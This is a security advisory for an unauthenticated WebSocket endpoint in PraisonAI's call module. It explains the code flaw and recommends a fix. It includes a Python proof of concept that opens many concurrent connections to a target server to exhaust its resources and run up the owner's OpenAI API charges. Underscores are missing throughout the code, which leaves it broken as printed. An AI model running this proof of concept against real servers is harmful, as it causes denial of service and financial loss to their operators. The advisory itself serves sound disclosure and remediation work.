PT-2026-59554 · Pypi · Praisonai

Published

2026-07-13

·

Updated

2026-07-13

CVSS v3.1

7.5

High

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

The /media-stream WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust server resources and drain the victim's OpenAI API credits.

Details

The vulnerability exists in src/praisonai/praisonai/api/call.py. The FastAPI application defines a WebSocket endpoint at line 108 with no authentication middleware, no Twilio request signature validation, and no rate limiting:
python
# line 108-112 — no auth, no middleware, accepts any WebSocket client
@app.websocket("/media-stream")
async def handle media stream(websocket: WebSocket):
  """Handle WebSocket connections between Twilio and OpenAI."""
  print("Client connected")
  await websocket.accept()
Immediately upon connection, the handler opens an authenticated session to OpenAI's paid Realtime API using the server's OPENAI API KEY:
python
# line 114-120 — each unauthenticated connection spawns a paid API session
  async with websockets.connect(
    'wss://api.openai.com/v1/realtime?model=gpt-4o-realtime-preview-2024-10-01',
    extra headers={
      "Authorization": f"Bearer {OPENAI API KEY}",
      "OpenAI-Beta": "realtime=v1"
    }
  ) as openai ws:
The receive from twilio() coroutine then reads unlimited messages and forwards them directly to OpenAI:
python
# line 128-135 — unbounded message ingestion, no size/rate check
        async for message in websocket.iter text():
          data = json.loads(message)
          if data['event'] == 'media' and openai ws.open:
            audio append = {
              "type": "input audio buffer.append",
              "audio": data['media']['payload']
            }
            await openai ws.send(json.dumps(audio append))
The server binds to 0.0.0.0 (line 273) and can be exposed to the internet via ngrok (--public flag). Twilio's RequestValidator is never used — the endpoint was designed to receive Twilio media streams but performs no verification that the connecting client is actually Twilio. The standard mitigation for Twilio WebSocket endpoints is to validate the X-Twilio-Signature header, which is absent here.
Additionally, uvicorn.run() is called without a ws max size parameter (line 273), defaulting to 16MB per WebSocket message. Combined with no connection limit, this allows substantial memory consumption.

PoC

bash
# Step 1: Verify the endpoint is accessible and accepts connections
python3 -c "
import asyncio
import websockets
import json

async def test():
  async with websockets.connect('ws://TARGET:8090/media-stream') as ws:
    # Send a start event (mimicking Twilio)
    await ws.send(json.dumps({
      'event': 'start',
      'start': {'streamSid': 'attacker-session-1'}
    }))
    # Send a media event — this gets forwarded to OpenAI Realtime API
    await ws.send(json.dumps({
      'event': 'media',
      'media': {'payload': 'SGVsbG8gV29ybGQ='}
    }))
    # Receive the OpenAI response routed back
    response = await asyncio.wait for(ws.recv(), timeout=10)
    print('Received response (confirms OpenAI session active):', response[:200])

asyncio.run(test())
"

# Step 2: Demonstrate resource exhaustion — open multiple concurrent connections
# Each connection spawns an OpenAI Realtime API session billed to the server owner
python3 -c "
import asyncio
import websockets
import json
import base64

async def open session(i):
  uri = 'ws://TARGET:8090/media-stream'
  async with websockets.connect(uri) as ws:
    await ws.send(json.dumps({
      'event': 'start',
      'start': {'streamSid': f'attacker-{i}'}
    }))
    # Send audio data to keep the OpenAI session active and billing
    payload = base64.b64encode(b'x00' * 8000).decode() # ~8KB audio chunk
    for  in range(100):
      await ws.send(json.dumps({
        'event': 'media',
        'media': {'payload': payload}
      }))
      await asyncio.sleep(0.01)
    print(f'Session {i}: sent 100 audio chunks to OpenAI via proxy')

async def main():
  # Open 10 concurrent sessions (each consuming OpenAI Realtime API credits)
  await asyncio.gather(*[open session(i) for i in range(10)])

asyncio.run(main())
"
Replace TARGET with the server's hostname/IP. Each connection in Step 2 opens a separate authenticated OpenAI Realtime API session. The server logs will show "Client connected" and "Incoming stream has started" for each attacker session.

Impact

  1. OpenAI API credit drain: Each unauthenticated WebSocket connection opens a billed OpenAI Realtime API session. An attacker can open many concurrent sessions and stream audio data, accumulating charges on the victim's OpenAI account. The Realtime API bills per-second of audio, making this financially impactful.
  2. Denial of service: Legitimate Twilio callers are denied service when the server's resources (memory, file descriptors, OpenAI API rate limits) are exhausted by attacker connections.
  3. Server memory exhaustion: With no per-message size limit (16MB default) and no connection limit, an attacker can consume server memory by opening many connections and sending large payloads.

Recommended Fix

Add Twilio signature validation, connection limits, and rate limiting:
python
from twilio.request validator import RequestValidator
from starlette.websockets import WebSocketState
import time

# Connection tracking
MAX CONCURRENT CONNECTIONS = 20
active connections = 0
connection lock = asyncio.Lock()

TWILIO AUTH TOKEN = os.getenv('TWILIO AUTH TOKEN')

@app.websocket("/media-stream")
async def handle media stream(websocket: WebSocket):
  global active connections
  
  # Enforce connection limit
  async with connection lock:
    if active connections >= MAX CONCURRENT CONNECTIONS:
      await websocket.close(code=1008, reason="Too many connections")
      return
    active connections += 1
  
  try:
    # Validate Twilio signature if auth token is configured
    if TWILIO AUTH TOKEN:
      validator = RequestValidator(TWILIO AUTH TOKEN)
      url = str(websocket.url).replace("ws://", "http://").replace("wss://", "https://")
      signature = websocket.headers.get("X-Twilio-Signature", "")
      if not validator.validate(url, {}, signature):
        await websocket.close(code=1008, reason="Invalid signature")
        return
    
    await websocket.accept()
    # ... rest of handler ...
  finally:
    async with connection lock:
      active connections -= 1
Additionally, pass ws max size to uvicorn to limit individual message sizes:
python
uvicorn.run(app, host="0.0.0.0", port=port, log level="warning", ws max size=1 048 576) # 1MB

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-2920

Affected Products

Praisonai